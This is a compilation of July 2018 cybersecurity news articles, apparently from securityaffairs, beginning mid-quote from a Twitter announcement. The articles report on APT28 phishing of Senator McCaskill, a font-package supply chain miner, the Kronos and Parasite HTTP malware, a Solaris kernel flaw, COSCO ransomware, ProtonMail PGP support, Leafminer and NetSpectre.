“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.

Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT

The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), that operated under the Russian military agency GRU, continues to target US politicians.

This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.

The news was reported by The Daily Beast, McCaskill always expressed criticism of Russia and its aggressive strategy in the cyberspace. McCaskill has repeatedly accused the Russian Government of “cyber warfare against our democracy,” she defined President Vladimir Putin as a “thug” and a “bully.”

Russian cyberspies launched spear-phishing attacks against the member of the staff aimed at stealing their credentials, a tactic already used against Hillary Clinton campaign manager John Podesta in 2016.

The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.

“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.

“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”

democratic Senator Claire McCaskill

In July, Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies.

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website it has taken down it and helped the US government to “avoid anybody being infected by that particular attack.”

“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.

Microsoft made sinkholing of the website, in this way it was able to track victims of the attacks that were redirected to the phishing attack.

The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.

Microsoft attributed the attacks to Russian APT28 group.

McCaskill released a statement confirming that cyberattack was unsuccessful.

“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.

“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”

Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency

Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.

Following Apple’s decision of banning cryptocurrency mining apps announced in June, also Google has updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.

“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.

Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and in some cases, it could also damage it by causing overheat or destroy batteries.

In December, experts from Kaspersky have spotted an Android malware dubbed Loapi that includes a so aggressive mining component that it can destroy your battery.

mining apps

Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.

Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.

Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor
28.7.2018 securityaffairs Attack

Microsoft revealed that hackers attempted to compromise the supply chain of an unnamed maker of PDF software.
The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines.

The attack was discovered by the experts from Microsoft that received alerts via the Windows Defender ATP.

Microsoft discovered that attackers compromised the cloud server infrastructure of a software company that provides font packages for other software firms.

The packages are distributed as MSI files and experts revealed that one of the companies using these packages was the firm that developed the PDF editor application.

The compromise lasted between January and March 2018, according to the tech giant the hackers compromised only a small number of machines, this could indicate that the hacked companies working with the font package provider have a small market share.

This is a multi-tier attack in which the attackers compromised the supply chain of the supply chain.

“A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case.” reads the analysis published by Microsoft.

“Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the app’s legitimate installer the unsuspecting carrier of a malicious payload.”

Supply chain attack-diagram-3

The hackers cloned the infrastructure of the company that develops the PDF Editor, they set up a server containing all MSI files, including font packages, all clean and digitally signed.

The hackers poisoned an MSI file associated with an Asian fonts pack with a crypto miner, then devised a technique to influence the download of the font by the PDF Editor from the attackers’ server.

Once the victims have installed the PDF editor app, the application will install the font packages from the cloned server managed by the attackers, including the tainted one.

Below the multi-tier attack described by Microsoft:

Attackers recreated the software partner’s infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font package, all clean and digitally signed, in the replica sever.
The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. With this package tampered with, it is no longer trusted and signed.
Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server.
The attackers have targeted the supply chain by hiding the miner in an installer to have full elevated privileges (SYSTEM) on a machine.

The crypto-mining malware would create a process named xbox-service.exe that abuses the computational resources of the victims to mine Monero coins.

The malware also tries to modify the Windows hosts file so that the victim’s machine can’t communicate with the update servers of certain PDF apps and security software. The trick would prevent remote cleaning and remediation of affected machines.

Kronos Banking Trojan resurrection, new campaigns spotted in the wild
28.7.2018 securityaffairs

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in the recent months.
The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.

The malware was first spotted in 2014 by researchers at security firm Trusteer that discovered an adv on the Russian underground market regarding a new financial Trojan dubbed Kronos.

Kronos banking trojan

The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variants share many similarities with older versions:

Extensive code overlap
Same Windows API hashing technique and hashes
Same string encryption technique
Extensive string overlap
Same C&C encryption mechanism
Same C&C protocol and encryption
Same webinject format (Zeus format)
Similar C&C panel file layout
“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” continues the analysis.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

A first campaign was observed on June 27, the malware was targeting German users with weaponized documents attached to spam emails. The macros included in the document was used as downloader for the payload, in some cases, the SmokeLoader downloader.

A second campaign was uncovered on July 13, the victims were infected through a malvertising campaign. The malicious ads pointed out to a website that thanks to JavaScript injections redirected visitors to the RIG exploit kit, that delivered SmokeLoader. The downloader would deliver the Kronos onto the compromised machines.

A third campaign was observed since July 15 and sees victims receiving fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”

Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs

Security expert discovered Kernel Level Privilege Escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3
Security researchers from Trustwave have discovered a new high severity vulnerability, tracked as CVE-2018-2892, that affected the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by a remote authenticated attacker to execute code with elevated privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The experts discovered that the flaw was first discovered in 2007 and it was publicly disclosed in 2009 during the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issued and an unbounded memory write vulnerability.

“The original issue was disclosed on stage at CanSec 2009 ( https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”

oracle solaris

Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.

According to the experts, the flaw is still present in the solution due to the introduction of additional code used for testing purposes.

Oracle addressed this flaw as a part of the July CPU security updates

Ransomware attack disrupted some systems of the shipping giant COSCO in the US
28.7.2018 securityaffairs

The Chinese shipping giant COSCO was reportedly hit by a ransomware based attack, the attack occurred in the American region.
According to COSCO a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack and quoted a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”

cosco ransomware

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported communications between the carrier’s U.S. operations and its customers has been slowed due to the cyber attack. Digital communications were disrupted and the communications were going on via telephone.

View image on Twitter
View image on Twitter

Cosco responds to cyber attack on US operations #maritime #containers http://bit.ly/2uMjJJS

10:52 PM - Jul 24, 2018
See JOC.com's other Tweets
Twitter Ads info and privacy
Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

According to the popular security expert Kevin Beaumont‏, the ransomware has infected a portion of the infrastructure that hosts the company website (cosco-usa.com), phone and email systems, and WAN and VPN gateways.

Catalin Cimpanu
· 26 Jul
Replying to @GossiTheDog
Their global website is still working fine. Only their US site is down from what it appears.http://lines.coscoshipping.com/home/News/detail/15325081261286611042/50000000000000231?id=50000000000000231 …

Kevin Beaumont

Yes, it is only Cosco Americas Inc (CAI) impacted. Anything on this network: https://ipinfo.io/AS32604 - includes their website http://www.cosco-usa.com , their phone system, WAN and VPN gateways, email etc.

12:54 AM - Jul 26, 2018
See Kevin Beaumont's other Tweets
Twitter Ads info and privacy

Kevin Beaumont

· 26 Jul
Replying to @GossiTheDog
If anybody from Cosco is reading I help with anything like this free of charge for the insight gained, send me an email if you want.

Kevin Beaumont

Cosco have put out a statement confirming the issue. I understand they’re now on their 4th day of downtime for CAI (Cosco Americas Inc) business unit. https://www.itwire.com/security/83772-cosco-s-us-arm-hit-by-windows-ransomware.html …

9:26 AM - Jul 26, 2018
Cosco's US arm hit by Windows ransomware
The North American arm of Chinese shipping conglomerate Cosco has been hit by Windows ransomware, affecting communications at its US locations.

See Kevin Beaumont's other Tweets
Twitter Ads info and privacy
At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

ProtonMail launches Address Verification and full PGP support
28.7.2018 securityaffairs Crypto

Address Verification allows you to be sure you are securely communicating with the right person, while PGP support adds encrypted email interoperability.
Starting with the latest release of ProtonMail on web (v3.14), iOS and Android (v1.9), and the latest versions of the ProtonMail IMAP/SMTP Bridge, ProtonMail now supports Address Verification, along with full PGP interoperability and support. In this article, we’ll discuss these two new features in detail, and how they can dramatically improve email security and privacy.

Address Verification
When ProtonMail first launched in 2014, our goal was to make email encryption ubiquitous by making it easy enough for anybody to use. This is no easy feat, and that’s probably why it had never been done before. Our guiding philosophy is that the most secure systems in the world don’t actually benefit society if nobody can use them, and because of this, we made a number of design decisions for the sake of better usability.

One of these decisions was to make encryption key management automatic and invisible to the user. While this made it possible for millions of people around the world to start using encrypted email without any understanding of what an encryption key is, the resulting architecture required a certain level of trust in ProtonMail.

While a certain level of trust is always necessary when you use online services, our goal is to minimize the amount of trust required so that a compromise of ProtonMail doesn’t lead to a compromise of user communications. This is the philosophy behind our use of end-to-end encryption and zero-access encryption, and it is also the philosophy behind Address Verification.

Prior to the introduction of Address Verification, if ProtonMail was compromised, it would be possible to compromise user communications by sending to the user a fake public encryption key. This could cause email communications to be encrypted in a way that an attacker, holding the corresponding fake private key, could intercept and decrypt the messages (this is also known as a Man-in-the Middle attack, or MITM), despite the fact that the encryption takes place client side.

Address Verification provides an elegant solution to this problem. We consider this to be an advanced security feature and probably not necessary for the casual user, but as there are journalists and activists using ProtonMail for highly sensitive communications, we have made adding Address Verification a priority.

How Address Verification works
Address Verification works by leveraging the Encrypted Contacts feature that we released previously. Starting with the latest version of ProtonMail, when you receive a message from a ProtonMail contact, you now have the option (in the ProtonMail web app) to Trust Public Keys for this contact. Doing so saves the public key for this contact into the encrypted contacts, and as contacts data is not only encrypted, but also digitally signed, it is not possible to tamper with the public encryption key once it has been trusted.

This means that when sending emails to this contact, it is no longer possible for a malicious third party (even ProtonMail) to trick you into using a malicious public key that is different from the one you have trusted. This allows for a much higher level of security between two parties than is possible with any other encrypted email service. You can learn more about using Address Verification in our knowledge base article.

PGP Support
At the same time as Address Verification, we are also launching full support for PGP email encryption. As some of you may know, ProtonMail’s cryptography is already based upon PGP, and we maintain one of the world’s most widely used open source PGP libraries. PGP support is also an advanced feature that we don’t expect most users to use. If you need secure email, the easiest and most secure way to get it is still to get both you and your contact on ProtonMail, or if you are an enterprise, to migrate your business to ProtonMail.

However, for the many out there who still use PGP, the launch of full PGP support will make your life a lot easier. First, any ProtonMail user can now send PGP encrypted emails to non-ProtonMail users by importing the PGP public keys of those contacts. Second, it is also possible to receive PGP email at your ProtonMail account from any other PGP user in the world. You can now export your public key and share it with them.

Therefore, your ProtonMail account can in fact fully replace your existing PGP client. Instead of sharing your existing PGP public key, you can now share the PGP public key associated with your ProtonMail account and receive PGP encrypted emails directly in your ProtonMail account.

If you are an existing PGP user and you would like to keep your existing custom email address (e.g. john@mydomain.com), we’ve got you covered there, too. It is possible to move your email hosting to ProtonMail and import your existing PGP keys for your address, so you don’t need to share new keys and a new email address with your contacts.

If you are using PGP for sensitive purposes, this might actually be preferable to continuing to use your existing PGP client. For one, PGP is fully integrated into ProtonMail, encryption/decryption is fully automated, and the new Address Verification feature is used to protect you against MITM attacks. More importantly though, ProtonMail is not susceptible to the eFail class of vulnerabilities, which have impacted many PGP clients, and our PGP implementations are being actively maintained.

You can find more details about using PGP with ProtonMail here.

Introducing ProtonMail’s public key server
Finally, we are formally launching a public key server to make key discovery easier than ever. If your contact is already using ProtonMail, then key discovery is automatic (and you can use Address Verification to make it even more secure if you want). But if a non-ProtonMail user (like a PGP user) wants to email you securely at your ProtonMail account, they need a way to discover your public encryption key. If they don’t get it from your public profile or website, they are generally out of luck.

Our public key server solves this problem by providing a centralized place to look up the public key of any ProtonMail address (and non-ProtonMail addresses hosted at ProtonMail).

Our public key server can be found at hkps://api.protonmail.ch (!! This link is used for HKP requests and cannot be accessed with a browser. However, if you want to download the public key of a ProtonMail users, simply replace the “username@protonmail.com” with the address you’re looking for and copy/paste the following link into your browser: https://api.protonmail.ch/pks/lookup?op=get&search=username@protonmail.com)

Concluding thoughts on open standards and federation
Today, ProtonMail is the world’s most widely used email encryption system, and for most of our users the addition of Address Verification and PGP support will not change how you use ProtonMail. In particular, setting up PGP (generating encryption keys, sharing them, and getting your contacts to do the same) is simply too complicated, and it is far easier for most people to simply create a ProtonMail account and benefit from end-to-end encryption and zero-access encryption without worrying about details like key management.

Still, launching PGP support is important to us. The beauty of email is that it is federated, meaning that anybody can implement it. It is not controlled by any single entity, it is not centralized, and there is not a single point of failure. While this does constrain email in many ways, it has also made email the most widespread and most successful communication system ever devised.

PGP, because it is built on top of email, is therefore also a federated encryption system. Unlike other encrypted communications systems, such as Signal or Telegram, PGP doesn’t belong to anybody, there is no single central server, and you aren’t forced to use one service over another. We believe encrypted communications should be open and not a walled garden. ProtonMail is now interoperable with practically ANY other past, present, or future email system that supports the OpenPGP standard, and our implementation of this standard is also itself open source.

ProtonMail PGP support

We still have a long way to go before we can make privacy accessible to everyone, and in the coming months and years we will be releasing many more features and products to make this possible. If you would like to support our mission, you can always donate or upgrade to a paid plan.

US-CERT warns of ongoing cyber attacks aimed at ERP applications
28.7.2018 securityaffairs Attack

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers an interesting report published by Digital Shadows and Onapsis.
US-CERT warns of cyber attacks on Enterprise resource planning (ERP) solutions such as Oracle and SAP, both nation-state actors and cybercrime syndicates are carrying out hacking campaign against these systems.
The report published by the US-CERT reference analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.“

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, there is an impressive number of systems exposed online without necessary security measures, it is quite easy for attackers to find online exploits that could be used to hack them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should
do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging of the applications and compromising business-critical applications.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications to steal SAP user credentials and use them in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected captured evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP
applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in the interest in exploits for SAP applications in the Dark Web.

Attacks vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.

Threat actors leverage continues to prefer well-known vulnerabilities instead of using zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by world’s largest commercial and government organizations.

ERP applications security report

“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Leaked information by third parties and employees can expose internal ERP applications.
Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. Such kind of information is a precious gift for hackers.

Experts recommend organizations to carefully review configurations for known vulnerabilities, change default passwords and enforce strong passwords for users.

Leafminer cyber espionage group targets Middle East
28.7.2018 securityaffairs CyberSpy

Hackers belonging an Iran-linked APT group tracked as ‘Leafminer’ have targeted government and various organizations in the Middle East.
An Iran-linked APT group tracked as ‘Leafminer’ has targeted government and businesses in the Middle.

According to the experts from Symantec, the Leafminer group has been active at least since early 2017.

“Symantec has uncovered the operations of a threat actor named Leafminer that is targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017. ” reads the analysis published by Symantec.

The experts detected malicious code and hacking tools associated with the cyber espionage group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries.

The extent of the campaigns conducted by the group could be wider, the researchers uncovered a list, written in Iran’s Farsi language, of 809 targets whose systems were scanned by the attackers.

The list groups each entry with organization of interest by geography and industry, in includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Most of the targets were in the financial, government and energy sectors.

Leafminer targets

The hackers used publicly available tools and custom-malware in their attacks.

“On a broad level, it has followed the recent trend among targeted attack groups for “living off the land”—using a mixture of publicly available tools alongside its own custom malware.” continues the report.

“More specifically, it mimicked Dragonfly’s use of a watering hole to harvest network credentials. It also capitalized on the Shadow Brokers release of Inception Framework tools, making use of the leaked Fuzzbunch framework by developing its own exploit payloads for it.”

Researchers discovered that hackers used three main techniques for initial intrusion of target networks:

Compromised web servers used for watering hole attacks
Scans/exploits for vulnerabilities of network services
Dictionary attacks against logins of network services

While analyzing the attacks conducted by the group, the experts discovered a download URL for a malware payload used to compromise the victims. The URL pointed out to a compromised web server on the domain e-qht[.]az that had been used to distribute Leafminer malware, payloads, and tools within the group and make them available for download from victim machines.

“As of early June 2018, the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers. In addition to malware and tools, the served files also included uploads of log files seemingly originating from vulnerability scans and post-compromise tools.” continues the report.

“The web shell is a modification of the PhpSpy backdoor and references the author MagicCoder while linking to the (deleted) domain magiccoder.ir. Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army.”

Symantec discovered two custom malware used by the Leafminer group, tracked as Trojan.Imecab and Backdoor.Sorgu, the former provides persistent access with a hardcoded password, the latter implements classic backdoor features.

The group also leveraged a modified version of the popular Mimikatz post-exploitation tool. To avoid detection, the group used a technique dubbed Process Doppelgänging, discovered in December 2017 by researchers from Ensilo security firm.

The technique is a fileless code injection method that exploits a built-in Windows function and an undocumented implementation of the Windows process loader.

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” concludes Symantec.

Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution
28.7.2018 securityaffairs

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.
In 2015, Melvin (25) and Dennis van den B. (21), were arrested from a district court in Rotterdam for their alleged involvement in CoinVault ransomware creation and distribution.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, make other people’s work inaccessible, and extortion of 1295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years. “

CoinVault ransomware was first spotted in the wild in May 2014, it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware
The two suspects are Duch brothers and were identified with the help of experts from Kaspersky Labs due to bad opsec. The experts from Kaspersky reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.” reported Kaspersky.

The two men, that have a clean criminal record, avoided the jail by collaborating in the investigation conducted by the authorities. The course sentenced them with 240 hours of community service, that corresponds to the maximum term of community service condemned people can serve.
The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Regularly backup your important files to a separate drive or storage that are only temporarily connected.
Be on high alert for pop-ups, spam, and unexpected email attachments.

Parasite HTTP RAT implements a broad range of protections and evasion mechanims
28.7.2018 securityaffairs

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.
The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulate environments. It first checks if an exception handler has run, then it checks whether between 900ms and two seconds elapsed in response to the routine’s 1-second sleep split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint

In presence of a sandbox, the RAT halts the execution and attempts to make hard the forensic investigations.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT

The Parasite HTTP RAT is written in C programming language. The author claims it has a small size (49kb) and has he no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) is encrypted, the author also offers a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

It is interesting to note that the malware involves a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints it also removes hooks on a series of DLLs to complicate the work of malware experts while investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.

NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows to steal data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that like the Spectre variant 1 (CVE-2017-5753) exploit a flaw in the speculative execution mechanism. The technique could bypass address-space layout randomization on the remote system and allow the attackers to execute code on the vulnerable system.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers that discovered the NetSpectre attack explained that the technique leverages the AVX-based covert channel to capture data at a deficient speed of 60 bits per hour from the target system.

“we present NetSpectre, a generic remote Spectre variant 1 attack. ” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cachefree Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system”

An attacker could carry out the Netspectre attack to read arbitrary memory from the systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

